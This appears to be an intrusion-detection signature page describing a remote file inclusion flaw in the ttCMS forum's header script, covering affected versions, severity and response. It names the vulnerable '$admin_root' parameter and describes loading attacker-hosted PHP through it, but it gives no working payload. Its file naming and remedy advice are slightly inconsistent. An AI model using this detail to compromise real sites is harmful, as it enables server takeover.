HTTP ttCMS News hdr.php File Inclusion

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the ttCMS header.php cgi script.

Additional Information

ttCMS is web based forum implemented in PHP and derived from YABB SE and ttForum.

A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL.

An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for the '$admin_root' parameter.

If the remote file is a malicious PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the web server. Successful exploitation may provide local access to the attacker.

Affected

ttCMS ttCMS 2.2, 2.3

Response

There are no known solutions for this vulnerability. It is advised that users of this CGI upgrade to the lastest verion.

Possible False Positives

There are no known false positives associated with this signature.